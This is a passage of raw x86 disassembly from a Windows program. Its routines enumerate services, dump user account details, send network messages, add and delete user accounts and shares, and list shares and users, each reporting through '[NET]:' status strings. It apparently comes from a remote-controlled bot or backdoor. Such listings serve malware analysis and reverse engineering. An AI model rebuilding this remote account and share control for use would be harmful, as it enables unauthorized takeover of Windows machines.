loc_406F61: ; CODE XREF: sub_406EA7+90�j
push offset aRunning ; " Running"
jmp short loc_406F7B
; ---------------------------------------------------------------------------
loc_406F68: ; CODE XREF: sub_406EA7+8D�j
push offset aStoping ; " Stoping"
jmp short loc_406F7B
; ---------------------------------------------------------------------------
loc_406F6F: ; CODE XREF: sub_406EA7+8A�j
push offset aStarting ; " Starting"
jmp short loc_406F7B
; ---------------------------------------------------------------------------
loc_406F76: ; CODE XREF: sub_406EA7+87�j
push offset aStopped ; " Stopped"
loc_406F7B: ; CODE XREF: sub_406EA7+B1�j
; sub_406EA7+B8�j ...
lea eax, [ebp+var_20]
loc_406F7E: ; CODE XREF: sub_406EA7+A3�j
; sub_406EA7+AA�j
push eax
call sub_414415
pop ecx
pop ecx
push dword ptr [esi]
lea eax, [ebp+var_20]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS_0 ; "%s: %s (%s)"
push eax
call sub_414415
push 1
push [ebp+arg_8]
lea eax, [ebp+var_38C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_406F2A
loc_406FC7: ; CODE XREF: sub_406EA7+77�j
cmp [ebp+var_8], ebx
jnz loc_406EDF
loc_406FD0: ; CODE XREF: sub_406EA7+6C�j
push [ebp+var_C]
call dword_435838 ; CloseServiceHandle
xor eax, eax
cmp eax, [ebp+var_4]
pop edi
sbb eax, eax
pop esi
neg eax
pop ebx
leave
retn
sub_406EA7 endp
; =============== S U B R O U T I N E =======================================
sub_406FE7 proc near ; CODE XREF: sub_4070A9+A�p
; sub_4070A9+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_406FF4
pop ebp
retn
; ---------------------------------------------------------------------------
loc_406FF4: ; CODE XREF: sub_406FE7+9�j
push ebx
push esi
mov esi, ds:dword_4200D4
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_41542E
pop ecx
push edi
mov ebx, eax
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn
sub_406FE7 endp
; =============== S U B R O U T I N E =======================================
sub_407028 proc near ; CODE XREF: sub_40FE91+248�p
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
arg_20 = dword ptr 24h
mov eax, offset loc_41F9CD
call sub_415890
push esi
xor esi, esi
cmp [esp+4+arg_10], esi
jnz short loc_40703F
xor eax, eax
jmp short loc_40709B
; ---------------------------------------------------------------------------
loc_40703F: ; CODE XREF: sub_407028+11�j
push ebx
push ebp
push edi
mov edi, ds:dword_4200D8
push esi
push esi
push esi
push esi
push 0FFFFFFFFh
push [esp+24h+arg_10]
mov ebx, 400h
push ebx
push esi
call edi ; WideCharToMultiByte
test byte ptr dword_435C28, 1
mov ebp, eax
jnz short loc_407080
or dword_435C28, 1
lea eax, [ebp+1]
push eax
mov [esp+4+arg_14], esi
call sub_41542E
pop ecx
loc_40707B: ; DATA XREF: .data:0042CC6C�o
; .data:0042CC80�o ...
mov dword_435C24, eax
loc_407080: ; CODE XREF: sub_407028+3C�j
push esi
push esi
push ebp
push dword_435C24
push 0FFFFFFFFh
push [esp+14h+arg_20]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, dword_435C24
pop edi
pop ebp
pop ebx
loc_40709B: ; CODE XREF: sub_407028+15�j
mov ecx, [esp+4]
pop esi
mov large fs:0, ecx
leave
retn
sub_407028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4070A9 proc near ; CODE XREF: sub_4077E4+6C�p
; sub_4101B8+18F�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push edi
push [ebp+arg_0]
call sub_406FE7
push [ebp+arg_4]
mov edi, eax
call sub_406FE7
push 24h
push [ebp+arg_4]
mov [ebp+var_24], eax
call sub_4158C0
push [ebp+arg_8]
neg eax
sbb eax, eax
and [ebp+var_1C], 0
or [ebp+var_14], 0FFFFFFFFh
and [ebp+var_10], 0
and eax, 80000000h
mov [ebp+var_20], eax
mov [ebp+var_18], 7Fh
call sub_406FE7
and [ebp+var_8], 0
add esp, 14h
mov [ebp+var_C], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 2
push edi
call dword_4357F0
pop edi
leave
retn
sub_4070A9 endp
; =============== S U B R O U T I N E =======================================
sub_407114 proc near ; CODE XREF: sub_4077E4+20�p
; sub_40FE91+1BD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_406FE7
push [esp+8+arg_4]
mov esi, eax
call sub_406FE7
pop ecx
pop ecx
push 0
push eax
push esi
call dword_43580C
pop esi
retn
sub_407114 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407137 proc near ; CODE XREF: sub_4079C1+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_406FE7
push [ebp+arg_4]
mov edi, eax
call sub_406FE7
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_406FE7
and [ebp+var_14], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
add esp, 0Ch
lea ecx, [ebp+var_4]
push ecx
mov [ebp+var_20], eax
xor eax, eax
lea ecx, [ebp+var_24]
inc eax
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call dword_4357D4
pop edi
leave
retn
sub_407137 endp
; =============== S U B R O U T I N E =======================================
sub_407191 proc near ; CODE XREF: sub_4079C1+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_406FE7
push [esp+8+arg_4]
mov esi, eax
call sub_406FE7
pop ecx
pop ecx
push eax
push esi
call dword_4358D0
pop esi
retn
sub_407191 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4071B2 proc near ; CODE XREF: sub_4079C1+2D�p
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 208h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_406FE7
push [ebp+arg_4]
mov esi, eax
call sub_406FE7
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call dword_4357F4
test eax, eax
mov [ebp+var_8], eax
jnz loc_40753F
mov eax, [ebp+var_4]
test eax, eax
jz loc_40757A
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_208]
push offset aAccountS ; "Account: %S"
push eax
call sub_414415
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_208]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+8]
lea eax, [ebp+var_208]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
push dword ptr [eax+4]
lea eax, [ebp+var_208]
push offset aCommentS ; "Comment: %S"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
mov eax, [eax+10h]
add esp, 40h
sub eax, 0
jz short loc_4072CB
dec eax
jz short loc_4072C4
dec eax
jz short loc_4072BD
mov eax, offset aUnknown ; "Unknown"
jmp short loc_4072D0
; ---------------------------------------------------------------------------
loc_4072BD: ; CODE XREF: sub_4071B2+102�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_4072D0
; ---------------------------------------------------------------------------
loc_4072C4: ; CODE XREF: sub_4071B2+FF�j
mov eax, offset aUser_1 ; "User"
jmp short loc_4072D0
; ---------------------------------------------------------------------------
loc_4072CB: ; CODE XREF: sub_4071B2+FC�j
mov eax, offset aGuest ; "Guest"
loc_4072D0: ; CODE XREF: sub_4071B2+109�j
; sub_4071B2+110�j ...
push eax
lea eax, [ebp+var_208]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
push dword ptr [eax+14h]
lea eax, [ebp+var_208]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_208]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
push dword ptr [eax+20h]
lea eax, [ebp+var_208]
push offset aParametersS ; "Parameters: %S"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+18h]
lea eax, [ebp+var_208]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
push dword ptr [eax+2Ch]
lea eax, [ebp+var_208]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+30h]
lea eax, [ebp+var_208]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
push dword ptr [eax+24h]
lea eax, [ebp+var_208]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+28h]
lea eax, [ebp+var_208]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
push dword ptr [eax+34h]
lea eax, [ebp+var_208]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_208]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
push dword ptr [eax+38h]
lea eax, [ebp+var_208]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_208]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
push dword ptr [eax+40h]
lea eax, [ebp+var_208]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+44h]
lea eax, [ebp+var_208]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_414415
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056BF
add esp, 20h
pop edi
pop ebx
jmp short loc_40756B
; ---------------------------------------------------------------------------
loc_40753F: ; CODE XREF: sub_4071B2+35�j
push eax
lea eax, [ebp+var_208]
push offset aNetUserInfoErr ; "[NET]: User info error: <%ld>"
push eax
call sub_414415
push 0
push [ebp+arg_10]
lea eax, [ebp+var_208]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4056BF
add esp, 20h
loc_40756B: ; CODE XREF: sub_4071B2+38B�j
cmp [ebp+var_4], 0
jz short loc_40757A
push [ebp+var_4]
call dword_435840
loc_40757A: ; CODE XREF: sub_4071B2+40�j
; sub_4071B2+3BD�j
mov eax, [ebp+var_8]
pop esi
leave
retn
sub_4071B2 endp
; =============== S U B R O U T I N E =======================================
sub_407580 proc near ; CODE XREF: sub_4076B0+9E�p
; sub_4077E4:loc_407824�p ...
mov ecx, 858h
cmp eax, ecx
ja loc_40762E
jz loc_407627
cmp eax, 7Bh
ja short loc_4075F3
jz short loc_4075E9
cmp eax, 5
jz short loc_4075DF
cmp eax, 8
jz short loc_4075D5
cmp eax, 32h
jz short loc_4075CB
cmp eax, 35h
jz short loc_4075C1
cmp eax, 57h
jnz loc_40767D
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_40769E
; ---------------------------------------------------------------------------
loc_4075C1: ; CODE XREF: sub_407580+2C�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_40769E
; ---------------------------------------------------------------------------
loc_4075CB: ; CODE XREF: sub_407580+27�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_40769E
; ---------------------------------------------------------------------------
loc_4075D5: ; CODE XREF: sub_407580+22�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_40769E
; ---------------------------------------------------------------------------
loc_4075DF: ; CODE XREF: sub_407580+1D�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_40769E
; ---------------------------------------------------------------------------
loc_4075E9: ; CODE XREF: sub_407580+18�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_40769E
; ---------------------------------------------------------------------------
loc_4075F3: ; CODE XREF: sub_407580+16�j
sub eax, 7Ch
jz short loc_407620
sub eax, 7C8h
jz short loc_407619
dec eax
jz short loc_40760F
dec eax
jnz short loc_40767D
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_40769E
; ---------------------------------------------------------------------------
loc_40760F: ; CODE XREF: sub_407580+80�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_40769E
; ---------------------------------------------------------------------------
loc_407619: ; CODE XREF: sub_407580+7D�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_40769E
; ---------------------------------------------------------------------------
loc_407620: ; CODE XREF: sub_407580+76�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_40769E
; ---------------------------------------------------------------------------
loc_407627: ; CODE XREF: sub_407580+D�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_40769E
; ---------------------------------------------------------------------------
loc_40762E: ; CODE XREF: sub_407580+7�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_407667
jz short loc_407660
sub eax, 8ADh
jz short loc_407692
dec eax
dec eax
jz short loc_407659
dec eax
jz short loc_407652
dec eax
dec eax
jnz short loc_40767D
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_40769E
; ---------------------------------------------------------------------------
loc_407652: ; CODE XREF: sub_407580+C5�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_40769E
; ---------------------------------------------------------------------------
loc_407659: ; CODE XREF: sub_407580+C2�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_40769E
; ---------------------------------------------------------------------------
loc_407660: ; CODE XREF: sub_407580+B7�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_40769E
; ---------------------------------------------------------------------------
loc_407667: ; CODE XREF: sub_407580+B5�j
sub eax, 8CAh
jz short loc_407699
sub eax, 17h
jz short loc_407692
sub eax, 25h
jz short loc_40768B
sub eax, 29h
jz short loc_407684
loc_40767D: ; CODE XREF: sub_407580+31�j
; sub_407580+83�j ...
push offset aAnUnknownError ; "An unknown error occurred."
jmp short loc_40769E
; ---------------------------------------------------------------------------
loc_407684: ; CODE XREF: sub_407580+FB�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_40769E
; ---------------------------------------------------------------------------
loc_40768B: ; CODE XREF: sub_407580+F6�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_40769E
; ---------------------------------------------------------------------------
loc_407692: ; CODE XREF: sub_407580+BE�j
; sub_407580+F1�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_40769E
; ---------------------------------------------------------------------------
loc_407699: ; CODE XREF: sub_407580+EC�j
push offset aNetworkConnect ; "Network connection not found."
loc_40769E: ; CODE XREF: sub_407580+3C�j
; sub_407580+46�j ...
push offset dword_435C30
call sub_414415
pop ecx
pop ecx
mov eax, offset dword_435C30
retn
sub_407580 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4076B0 proc near ; CODE XREF: sub_4089DC+1E04�p
var_71C = byte ptr -71Ch
var_31C = byte ptr -31Ch
var_10C = byte ptr -10Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 71Ch
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_71C]
push eax
call sub_415A8A
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
mov esi, 108h
push eax
mov [ebp+var_4], esi
call ds:dword_4200DC ; GetComputerNameA
push esi
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_31C]
push eax
call sub_415A8A
lea eax, [ebp+var_71C]
push eax
call sub_41597E
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+var_71C]
push eax
push 0
lea eax, [ebp+var_31C]
push eax
push 0
call dword_43581C
test eax, eax
jnz short loc_407740
push offset aNetMessageSent ; "[NET]: Message sent successfully."
mov esi, offset dword_435C90
push esi
call sub_414415
pop ecx
pop ecx
jmp short loc_407767
; ---------------------------------------------------------------------------
loc_407740: ; CODE XREF: sub_4076B0+7A�j
lea ecx, [ebp+var_71C]
push ecx
lea ecx, [ebp+var_31C]
push ecx
call sub_407580
push eax
push offset aNetSServerSMes ; "[NET]: %s <Server: %S> <Message: %S>"
mov esi, offset dword_435C90
push esi
call sub_414415
add esp, 14h
loc_407767: ; CODE XREF: sub_4076B0+8E�j
mov eax, esi
pop esi
leave
retn
sub_4076B0 endp
; =============== S U B R O U T I N E =======================================
sub_40776C proc near ; CODE XREF: sub_4089DC:loc_40A5E3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_4077C2
push 0
lea esi, [eax+eax*2]
push 0
shl esi, 2
push dword_42B478[esi]
push edi
push eax
call sub_406C8B
add esp, 14h
test eax, eax
jnz short loc_4077B4
push edi
push off_42B474[esi]
push offset aNetSServiceS_ ; "[NET]: %s service: '%s'."
loc_4077A4: ; CODE XREF: sub_40776C+54�j
mov esi, offset dword_435E90
push esi
call sub_414415
add esp, 10h
jmp short loc_4077DF
; ---------------------------------------------------------------------------
loc_4077B4: ; CODE XREF: sub_40776C+2A�j
call sub_406D2D
push eax
push edi
push offset aNetErrorWithSe ; "[NET]: Error with service: '%s'. %s"
jmp short loc_4077A4
; ---------------------------------------------------------------------------
loc_4077C2: ; CODE XREF: sub_40776C+C�j
lea eax, [eax+eax*2]
push off_42B470[eax*4]
mov esi, offset dword_435E90
push offset aNetSNoServiceS ; "[NET]: %s: No service specified."
push esi
call sub_414415
add esp, 0Ch
loc_4077DF: ; CODE XREF: sub_40776C+46�j
pop edi
mov eax, esi
pop esi
retn
sub_40776C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4077E4 proc near ; CODE XREF: sub_4089DC:loc_40A6C7�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_40787C
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_40780D
dec eax
jnz short loc_40785C
push edi
push 0
call sub_407114
pop ecx
pop ecx
jmp short loc_407858
; ---------------------------------------------------------------------------
loc_40780D: ; CODE XREF: sub_4077E4+18�j
cmp [ebp+arg_8], 0
jnz short loc_40784A
push 24h
push edi
call sub_4158C0
test eax, eax
pop ecx
pop ecx
jnz short loc_40784A
push 57h
pop eax
loc_407824: ; CODE XREF: sub_4077E4+76�j
call sub_407580
push eax
push edi
lea eax, [esi+esi*2]
push off_42B470[eax*4]
mov esi, offset dword_436090
push offset aNetSErrorWithS ; "[NET]: %s: Error with share: '%s'. %s"
push esi
call sub_414415
add esp, 14h
jmp short loc_40789C
; ---------------------------------------------------------------------------
loc_40784A: ; CODE XREF: sub_4077E4+2D�j
; sub_4077E4+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_4070A9
add esp, 0Ch
loc_407858: ; CODE XREF: sub_4077E4+27�j
test eax, eax
jnz short loc_407824
loc_40785C: ; CODE XREF: sub_4077E4+1B�j
push edi
lea eax, [esi+esi*2]
push off_42B474[eax*4]
mov esi, offset dword_436090
push offset aNetSShareS_ ; "[NET]: %s share: '%s'."
push esi
call sub_414415
add esp, 10h
jmp short loc_40789C
; ---------------------------------------------------------------------------
loc_40787C: ; CODE XREF: sub_4077E4+A�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push off_42B470[eax*4]
mov esi, offset dword_436090
push offset aNetSNoShareSpe ; "[NET]: %s: No share specified."
push esi
call sub_414415
add esp, 0Ch
loc_40789C: ; CODE XREF: sub_4077E4+64�j
; sub_4077E4+96�j
pop edi
mov eax, esi
pop esi
pop ebp
retn
sub_4077E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078A2 proc near ; CODE XREF: sub_4089DC+1D18�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_406FE7
xor esi, esi
push esi
push [ebp+arg_8]
mov [ebp+var_10], eax
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
mov [ebp+var_4], esi
push [ebp+arg_0]
mov [ebp+var_14], esi
mov [ebp+var_C], esi
call sub_4056BF
add esp, 18h
loc_4078DB: ; CODE XREF: sub_4078A2+10D�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_8]
push eax
push 1F6h
push [ebp+var_10]
call dword_435908
mov ebx, eax
cmp ebx, esi
jz short loc_40793C
cmp ebx, 0EAh
jz short loc_40793C
push ebx
call sub_407580
push eax
lea eax, [ebp+var_214]
push offset aNetShareListEr ; "[NET]: Share list error: %s <%ld>"
push eax
call sub_414415
push esi
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 24h
jmp short loc_4079A9
; ---------------------------------------------------------------------------
loc_40793C: ; CODE XREF: sub_4078A2+5D�j
; sub_4078A2+65�j
xor edi, edi
inc edi
cmp [ebp+var_4], edi
jb short loc_4079A0
mov esi, [ebp+var_8]
add esi, 14h
loc_40794A: ; CODE XREF: sub_4078A2+FA�j
push dword ptr [esi+10h]
call dword_435900 ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_407961
mov eax, offset aNo ; "No"
loc_407961: ; CODE XREF: sub_4078A2+B8�j
push eax
push dword ptr [esi]
lea eax, [ebp+var_214]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_414415
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+var_4]
jbe short loc_40794A
xor esi, esi
loc_4079A0: ; CODE XREF: sub_4078A2+A0�j
push [ebp+var_8]
call dword_435840
loc_4079A9: ; CODE XREF: sub_4078A2+98�j
cmp ebx, 0EAh
jz loc_4078DB
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_4078A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4079C1 proc near ; CODE XREF: sub_4089DC:loc_40A769�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_407A64
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_407A03
dec eax
jz short loc_4079F8
dec eax
jnz short loc_407A1E
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_4071B2
add esp, 14h
jmp short loc_407A1A
; ---------------------------------------------------------------------------
loc_4079F8: ; CODE XREF: sub_4079C1+1D�j
push ebx
push edi
call sub_407191
pop ecx
pop ecx
jmp short loc_407A1A
; ---------------------------------------------------------------------------
loc_407A03: ; CODE XREF: sub_4079C1+1A�j
cmp [ebp+arg_8], edi
jz short loc_407A17
push [ebp+arg_8]
push ebx
push edi
call sub_407137
add esp, 0Ch
jmp short loc_407A1A
; ---------------------------------------------------------------------------
loc_407A17: ; CODE XREF: sub_4079C1+45�j
push 57h
pop eax
loc_407A1A: ; CODE XREF: sub_4079C1+35�j
; sub_4079C1+40�j ...
cmp eax, edi
jnz short loc_407A3E
loc_407A1E: ; CODE XREF: sub_4079C1+20�j
push ebx
lea eax, [esi+esi*2]
push off_42B474[eax*4]
mov esi, offset dword_436290
push offset aNetSUsernameS_ ; "[NET]: %s username: '%s'."
push esi
call sub_414415
add esp, 10h
jmp short loc_407A84
; ---------------------------------------------------------------------------
loc_407A3E: ; CODE XREF: sub_4079C1+5B�j
call sub_407580
push eax
push ebx
lea eax, [esi+esi*2]
push off_42B470[eax*4]
mov esi, offset dword_436290
push offset aNetSErrorWithU ; "[NET]: %s: Error with username: '%s'. %"...
push esi
call sub_414415
add esp, 14h
jmp short loc_407A84
; ---------------------------------------------------------------------------
loc_407A64: ; CODE XREF: sub_4079C1+D�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push off_42B470[eax*4]
mov esi, offset dword_436290
push offset aNetSNoUsername ; "[NET]: %s: No username specified."
push esi
call sub_414415
add esp, 0Ch
loc_407A84: ; CODE XREF: sub_4079C1+7B�j
; sub_4079C1+A1�j
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn
sub_4079C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A8B proc near ; CODE XREF: sub_4089DC+1DBA�p
var_21C = byte ptr -21Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
push [ebp+arg_C]
xor esi, esi
mov [ebp+var_4], esi
call sub_406FE7
push esi
push [ebp+arg_8]
mov [ebp+var_18], eax
push offset aUsernameAccoun ; "Username accounts for local system:"
push [ebp+arg_4]
mov [ebp+var_8], esi
push [ebp+arg_0]
mov [ebp+var_14], esi
mov [ebp+var_1C], esi
mov [ebp+var_C], esi
call sub_4056BF
add esp, 18h
push ebx
loc_407ACA: ; CODE XREF: sub_407A8B+129�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_4]
push eax
push 2
push esi
push [ebp+var_18]
call dword_4357E8
cmp eax, esi
mov [ebp+var_10], eax
jz short loc_407B29
cmp eax, 0EAh
jz short loc_407B29
push eax
call sub_407580
push eax
lea eax, [ebp+var_21C]
push offset aNetUserListErr ; "[NET]: User list error: %s <%ld>"
